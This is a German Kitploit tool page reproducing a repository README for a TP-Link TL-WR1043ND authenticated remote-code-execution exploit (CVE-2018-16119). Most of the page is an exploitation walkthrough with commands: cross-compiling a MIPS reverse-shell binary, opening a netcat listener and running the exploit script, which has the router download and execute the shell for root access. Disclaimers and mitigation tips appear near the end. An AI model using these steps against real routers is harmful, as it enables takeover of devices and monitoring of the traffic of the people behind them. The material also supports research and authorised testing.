Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-16119 — TP-Link TL-WR1043ND – Authentifizierte Remote-Codeausführung | Kitploit
Tools/GitHubGitHub/hdbreaker/cve-2018-16119
Embedded-System-SicherheitIoT-SicherheitExploitationWebanwendungs-ExploitationPenetrationstestsHardware-SicherheitLernen & BildungRed TeamingPayload-Entwicklung
GitHubhdbreaker/cve-2018-16119

CVE-2018-16119

TP-Link TL-WR1043ND – Authentifizierte Remote-Codeausführung

163vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigenWebseite

CVE-2018-16119: Authentifizierte Remotecodeausführung in TP-Link WR1043ND

Übersicht

CVE-2018-16119 ist eine kritische Schwachstelle für authentifizierte Remotecodeausführung, die TP-Link TL-WR1043ND Router betrifft. Diese Schwachstelle ermöglicht es authentifizierten Angreifern, beliebige Befehle auf dem Zielgerät mit Root-Rechten auszuführen, was potenziell zu einer vollständigen Kompromittierung des Systems führt.

CVE-Details: CVE-2018-16119

Auswirkungen der Schwachstelle

  • Angriffsvektor: Netzwerk
  • Angriffskomplexität: Niedrig
  • Erforderliche Berechtigungen: Niedrig (Authentifizierung erforderlich)
  • Benutzerinteraktion: Keine
  • Auswirkung: Geändert
  • Auswirkung: Vollständige Kompromittierung der Vertraulichkeit, Integrität und Verfügbarkeit des Geräts

Nach der Ausnutzung erhält ein Angreifer Root-Shell-Zugriff auf den Router, was ihm ermöglicht:

  • Routerkonfigurationen zu ändern
  • Netzwerkverkehr zu überwachen
  • Das Gerät als Ausgangspunkt für laterale Bewegungen zu nutzen
  • Dauerhafte Hintertüren zu installieren
  • Netzwerkkonnektivität zu stören

Betroffene Geräte

  • TP-Link TL-WR1043ND (mehrere Firmware-Versionen)
  • Möglicherweise andere TP-Link-Geräte mit ähnlicher Firmware

Voraussetzungen

Systemanforderungen

  • Linux-Host mit Root-Rechten (erforderlich für TFTP-Server auf Port 69)
  • Docker (für Cross-Kompilierung)
  • Netzwerkkonnektivität zum Zielgerät
  • Gültige Authentifizierungsdaten für den Zielrouter

Abhängigkeiten

root@kitploit:~
# Install required packages
sudo apt-get update
sudo apt-get install netcat docker.io

Anleitung zur Ausnutzung

Schritt 1: Kompilieren des Reverse-Shell-Payloads

Der Exploit erfordert eine MIPS-Big-Endian-Reverse-Shell-Binärdatei. Befolgen Sie diese Schritte, um sie zu kompilieren:

root@kitploit:~
# Copy the source code to /tmp
cp exploit/tftp_server/reverse_shell_mipsbe.c /tmp/

# Use Docker container with MIPS cross-compilation tools
docker run -v /tmp/:/tmp/ -it asmimproved/qemu-mips /bin/bash

Innerhalb des Docker-Containers:

root@kitploit:~
cd /tmp
mips-linux-gnu-gcc -static reverse_shell_mipsbe.c -o shh

Docker beenden und die kompilierte Binärdatei kopieren:

root@kitploit:~
cp /tmp/shh exploit/tftp_server/

Schritt 2: Einrichten des Reverse-Shell-Listeners

Öffnen Sie ein Terminal und starten Sie einen Netcat-Listener auf Port 9669:

Linux:

root@kitploit:~
nc -l -p 9669 -vv

macOS:

root@kitploit:~
nc -l 9669 -vv

Schritt 3: Ausführen des Exploits

Führen Sie das Exploit-Skript mit Root-Rechten aus (erforderlich für TFTP-Server):

root@kitploit:~
sudo python3 exploit/exploit.py

Das Skript wird:

  1. Am Zielrouter authentifizieren
  2. Einen TFTP-Server auf Port 69 starten
  3. Die Schwachstelle ausnutzen, um die Reverse-Shell herunterzuladen und auszuführen
  4. Eine Verbindung zu Ihrem Listener herstellen

Schritt 4: Interagieren mit der Shell

Sobald die Verbindung hergestellt ist:

  • Sie haben Root-Zugriff auf den Router
  • Zunächst wird keine ausführliche Ausgabe angezeigt
  • Geben Sie einfach Befehle ein, um mit der Shell zu interagieren

Projektstruktur

root@kitploit:~
CVE-2018-16119/
├── exploit/
│   ├── exploit.py              # Main exploit script
│   ├── requirements.txt        # Python dependencies
│   ├── notes.txt              # Additional notes
│   └── tftp_server/
│       ├── reverse_shell_mipsbe.c  # Reverse shell source code
│       └── shh                     # Compiled MIPS binary
├── firmware/
│   └── wr740nv4_webrevert.bin     # Sample firmware
├── squashfs-root/                  # Extracted firmware filesystem
└── README.md                       # This file

Sicherheitshinweise

Verantwortungsvolle Offenlegung

Diese Schwachstelle wurde verantwortungsvoll offengelegt und sollte nur verwendet werden für:

  • Autorisierte Penetrationstests
  • Sicherheitsforschung in kontrollierten Umgebungen
  • Bildungszwecke

Rechtlicher Hinweis

⚠️ WARNUNG: Dieser Exploit wird ausschließlich zu Bildungs- und autorisierten Testzwecken bereitgestellt. Der unbefugte Zugriff auf Computersysteme ist illegal und unethisch. Die Benutzer sind dafür verantwortlich, sicherzustellen, dass sie vor der Verwendung dieses Tools die entsprechende Autorisierung besitzen.

Empfehlungen zur Schadensbegrenzung

  • Aktualisieren Sie auf die neueste Firmware-Version
  • Ändern Sie die Standard-Administrator-Anmeldedaten
  • Deaktivieren Sie die Fernverwaltung, falls nicht erforderlich
  • Implementieren Sie Netzwerksegmentierung
  • Überwachen Sie auf verdächtige Netzwerkaktivitäten

Abhängigkeiten

Python-Abhängigkeiten installieren:

root@kitploit:~
pip3 install -r exploit/requirements.txt

Fehlerbehebung

Häufige Probleme

TFTP-Server-Zugriff verweigert:

  • Stellen Sie sicher, dass das Skript mit Root-Rechten ausgeführt wird
  • Überprüfen Sie, ob Port 69 nicht bereits verwendet wird

Verbindung fehlgeschlagen:

  • Überprüfen Sie die Netzwerkkonnektivität zum Ziel
  • Bestätigen Sie, dass die Authentifizierungsdaten korrekt sind
  • Überprüfen Sie die Firewall-Einstellungen

Keine Shell-Antwort:

  • Die Shell benötigt möglicherweise einen Moment zur Initialisierung
  • Versuchen Sie, die Eingabetaste zu drücken oder einfache Befehle wie id oder pwd einzugeben

Forschung & Entwicklung

Diese Forschung zeigt kritische Sicherheitsmängel in der Firmware eingebetteter Geräte auf. Die Schwachstelle unterstreicht die Bedeutung von:

  • Sichere Codierungspraktiken in eingebetteten Systemen
  • Regelmäßige Sicherheitsaudits von IoT-Geräten
  • Rechtzeitige Firmware-Updates und Patch-Management

Referenzen

  • CVE-2018-16119 Official Entry
  • TP-Link Security Advisories

Kontakt & Zuschreibung

Forschung von: Alejandro Parodi
Twitter: @hdbreaker
LinkedIn: Alejandro Parodi


Diese Forschung wurde zu Bildungszwecken und zur Verbesserung der Sicherheit eingebetteter Systeme durchgeführt. Bitte verwenden Sie es verantwortungsvoll.

Tool herunterladen